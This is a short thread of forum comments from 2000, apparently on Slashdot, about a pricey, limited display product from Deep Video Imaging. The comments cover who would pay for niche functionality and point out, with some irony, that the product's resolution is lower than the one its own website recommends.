  • by Stephen Samuel ( 106962 ) <samuel@@@bcgreen...com> on Friday May 19, 2000 @12:14PM (#1060651) Homepage Journal
    > Who would pay that much for such limited functionality ?

    Pretty easy to answer: The people who want/need it. Not many people have much use for someone who can dunk a basketball from the 3 point line 95% of the time either. On the other hand, the people who do (e.g. NBA teams) are willing to pay a REALLY pretty penny for the ability.

    Similarly when I'm looking for a job. Not everybody needs my skill set, but those who do are willing to pay reasonably well for it :-((But not as much as Jordan gets))-:

  • Unfortunately, it's only 800 x 600 x 2 so far

    And on their site:

    © 1999 - 2000 Deep Video Imaging Ltd. All Rights Reserved. View Legal Information.
    This site is best viewed with a screen resolution of 1024 x 768


    Join the army, meet interesting people, kill them.

If I have not seen so far it is because I stood in giant's footsteps.
